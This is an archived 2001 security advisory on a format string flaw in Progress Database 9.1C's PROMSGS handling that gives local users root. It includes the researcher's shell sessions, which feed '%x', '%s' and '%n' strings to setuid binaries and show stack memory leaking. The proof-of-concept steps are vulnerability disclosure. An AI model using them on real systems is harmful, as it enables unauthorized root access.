SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Progress Database Vendors:   Progress Software Corporation
Progress Database Format String Vulnerability Yields Root Privileges to Local Users
SecurityTracker Alert ID:  1002688
SecurityTracker URL:  http://securitytracker.com/id/1002688
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 2 2001
Impact:   Execution of arbitrary code via local system, Root access via local system

Version(s): Version 9.1C; possibly others
Description:   A format string vulnerability has been reported in Progress Database. A local user can execute arbitrary shell commands with root level privileges.

The vulnerability is reportedly in the processing of the PROMSGS environment variable. A local user can set this variable to a specially crafted format string to potentially cause arbitrary shell commands to be executed with root level privileges.

It is reported that all set user id (suid) programs in the dlc/bin dir are vulnerable, including _dbutil, _mprosrv, _mprshut, _proapsv, _progres, _proutil, _rfutil, _probuild, and prolib.

Impact:   A local user may be able to execute arbitrary shell commands with root level privileges, giving the user root level access on the host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.progress.com/v9/datasheets/rdbms.htm (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (DGUX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   None.


 Source Message Contents

Subject:  Progres Databse PROMSGS Format strings issue.


Well once again I have found yet another Progress database issue. 
The PROMSGS has been looked at one time already for buffer overflows. 
It was supposed to be fixed. I was poking around at it today and noticed
these format strings issues...
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001      

First test with a malformed PROMSGS. 

[elguapo@linux bin]$ echo blah > file
[elguapo@linux bin]$ export PROMSGS=./file
[elguapo@linux bin]$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Test to make sure they fixed my original hole with the buffer overflows.
(looks fine)

[elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Well if you use a format string instead of an A we get much better
results. 

[elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10
000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec0
0xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912


[elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow msg)

[elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

I am sure you get the idea... 

ALL suids in the dlc/bin dir are affected 
[elguapo@linux bin]$ ./_dbutil
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81159280xbffff77c0x00x00x805ec350x11cdf40x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff7250xbffff72c0x80543750x00x81222a00x81222a00x81161c00x900x81159280xbffff77c0x00x00x40015b980x7c304040x400
12b4b0xbffff7000x40015a400x804bb1b0x00x10x400c4a4c0x400227c8%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x80fd96e0x81159280x81271340x00xbffff61c0x806540b0x40x8126fd80x81159280xbffff77c0x00x804daea0x00x81222a00x10x81159280x2080xbffff7480xdff00000x00x00x00x616441740x532f0x00x00xbffff7800x00x4e2069720x2020766f0x333120320x3a33313a0x322031310xa3130300x80
00ff000x80b00d0c0x3900ffb00x2043312e0x202020200x20202020%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_mprosrv
14:03:13 Error formatting messaage 96.  Message file is corrupt.
14:03:13
0x00x00x3e0x812f6280xbffff82c0x10x00x3f0xfff5e40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80582250x00x813e8c00x813e8c00x81300200x900x812f6280xbffff82c0x10x400003d40x400157e00x80x40022c1
40x80x400c816c0x10x00x400229240xc0b8fae0x400227b8%
14:03:13 errno=0 reading promsgs file, it may have been deleted.
14:03:13 Unable to format message number 940
[elguapo@linux bin]$ ./_mprshut
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81802500xbffff82c0x10x00x805af750x1858740x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff6a00x80587650x00x819b8c00x819b8c00x8180d800x900x81802500xbffff82c0x10x00x00x00x00x00x00x00x00x0
0x00x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./_proapsv
14:03:33 02 Nov 2001
  Error formatting messaage 96.  Message file is corrupt.
14:03:33 02 Nov 2001
 
0x00x00x3e0x842f7f00xbffff8300xbffff82c0x00x80645050x435d140x00xbffffd510x78
 
2578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff825
 
0xbffff4180x80630150x00x84573200x84573200x84312200x900x842f7f00x00xbffff82c0
 
x40015a400x400154140x40015a400x805527a0xbffff3680x4000d3600x40015b940x40022c
  900x70x00x180%
[elguapo@linux bin]$ ./_progres
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x840eaf00xbffff82c0x10x00x80646750x414ff40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7440x80631850x00x842d1200x842d1200x84105000x900x840eaf00xbffff82c0x10xbffff67c0x00x401e5f2c0x10
000x401e44a00xbffff6780x4013f2bd0x10000x401e5f2c0xbffff7280x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x83bc8ce0x840eaf00x843296c0x00xbffff6340x807b0fb0x40x84328100x840eaf00xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5540x842d1200xbffff6d40x83587c30xbffff5540xbffff6140xc00xbffff5540x842d120
0xbffff5540x842d1200x840eaf00x00x842d1200x50x2000x8a0xbffff5bd0x920xbffff57d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_proutil
\Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81ae9480xbffff82c0x10x00x80595d50x1b3f340x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80580e50x00x81d77200x81d77200x81af4400x900x81ae9480xbffff82c0x10x40015b940x6dcac560x40012b
4b0xbffff6f00x40015a400x804cdee0x400c5a4c0x400227c80x400c255c0x400227c80x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x817912e0x81ae9480x81dc5b40x00xbffff6100x806ea1b0x40x81dc4580x81ae9480xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5300x81d77200xbffff6b00x816cdd30xbffff5300xbffff5f00xc00xbffff5300x81d7720
0xbffff5300x81d77200x81ae9480x00x81d77200x50x2000x8a0xbffff5990x920xbffff559%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_rfutil
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x812d0080xbffff82c0x10x00x80586b50x1324740x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff71c0x80571c50x00x81433e00x81433e00x812d9800x900x812d0080xbffff82c0x10x40015b940x6dcac560x40012b
4b0xbffff6ec0x40015a400x804c3a70x400c5a4c0x400227c80x400c255c0x400227c80xbffff67c%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./prolib
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x806c4480x806e4ac0xbffff5fc0x00x00x00x00xbffffd550x782578250x782578250x782578250x782578250x782578250x782578250x782578250x7250xbffff3cc0x804b5590x00x806c4480x806e4ac0x7970x00x806e4ac0x00x00x00x00x00x00x00x00x00x00x00x00x0%errno=0
reading promsgs file, it may have been deleted.
Unable to format message number 1943

-KF

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC